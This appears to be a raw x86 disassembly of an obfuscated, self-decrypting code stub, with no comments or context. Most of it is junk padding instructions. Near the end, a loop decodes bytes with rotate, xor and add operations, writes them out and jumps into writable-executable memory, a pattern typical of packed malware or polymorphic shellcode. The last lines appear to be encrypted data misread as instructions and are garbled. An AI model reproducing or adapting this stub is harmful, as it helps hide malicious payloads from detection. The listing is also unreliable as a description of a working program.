_start
cmp edi eax
aad 0xa
das
add ebx edx
sub edi 0x7c92eb94
adc ebx ecx
aad 0xa
test edx ebx
aad 0xa
mov edi 0x7c92eb94
mov esi 0x7c92eb94
dec ecx
dec esi
xor ebx 0x2
aad 0xa
stc
test eax 0x2
dec eax
inc eax
test eax esi
adc eax edx
sub eax eax
das
mov edi 0x1d24
aam 0xa
test eax 0x0
or edx 0x0
mov ebx eax
mov edx ebx
add edi rw-data
daa
cmp ebx eax
add ecx 0xc781
dec edx
or esi 0xc781
test ecx 0xc781
test ecx esi
sub edx ebx
cmp ebx 0xc781
adc ecx eax
dec edx
das
cmp ecx 0xc781
aam 0xa
inc ecx
mov ebx 0xc781
inc ecx
daa
cmc
add ecx 0xc781
inc edx
inc esi
aad 0xa
aad 0xa
inc eax
dec ebx
test edx 0xc781
adc esi esi
aad 0xa
add esi edx
aam 0xa
dec edx
inc edx
and ecx 0xc781
test edx 0xc781
aad 0xa
stc
mov esi 0x1
aam 0xa
xor edx 0x1
mov ecx 0x4ebf
aam 0xa
stc
aam 0xa
add eax 0x1
and esi 0x1
cmp esi esi
das
add ecx 0xffffb81f
cld
or esi 0xc181
test eax 0xc181
aam 0xa
xor esi edx
test eax 0xc181
or edx 0xc181
das
or eax 0xc181
sub ebx ebx
daa
or eax 0x1
dec ebx
or edx 0x1
mov esi 0xffbeadd7
sub ebx 0x0
adc edx eax
das
test ebx 0x0
not esi
aam 0xa
sub eax 0xd6f7
clc
or eax eax
cmp eax edx
inc eax
dec ebx
test edx 0xd6f7
adc ebx eax
add edx edx
aad 0xa
test edx 0xd6f7
test edx 0xd6f7
cmc
clc
cld
aam 0xa
or edx ebx
aam 0xa
daa
aam 0xa
stc
aam 0xa
add eax 0xd6f7
and ebx 0xd6f7
das
das
cld
or eax 0x0
test eax eax
xor edx edx
sub eax 0x0
or edx 0x0
das
or eax 0x0
aad 0xa
daa
cmp ebx eax
add ebx 0x0
or eax 0x0
dec ebx
add edx 0x0
cmp ebx 0x0
test ebx ebx
dec edx
das
cmp ebx 0x0
aam 0xa
sub eax 0x0
clc
or eax eax
cmp eax edx
inc eax
dec ebx
test edx 0x0
adc ebx eax
add edx edx
aad 0xa
test edx 0x0
test edx 0x0
cmc
clc
cld
aam 0xa
or edx ebx
aam 0xa
cmp edx eax
or eax ebx
daa
add al 0xea
clc
add al cl
sub al 0xe
stc
add al 0x8e
rol al 0x37
ror al 0x1b
not al
add al cl
add al cl
jmp rwxdata
xor al 0x2a
jmp rwxdata
ror al 0x7c
add al cl
ror al 0x30
stosb [ edi ]
loop rwxdata
lodsb [ esi ]
clc
sub al 0xf2
sub al cl
add al cl
jmp rwxdata
mov ebp 0x6480a0c5
mov [ 0x6f5dd7af ] eax
outsd
sub_407233
aad 0x77
dec esp
sub eax 0xb4f06f8e
outsb
retn 0x7bc3
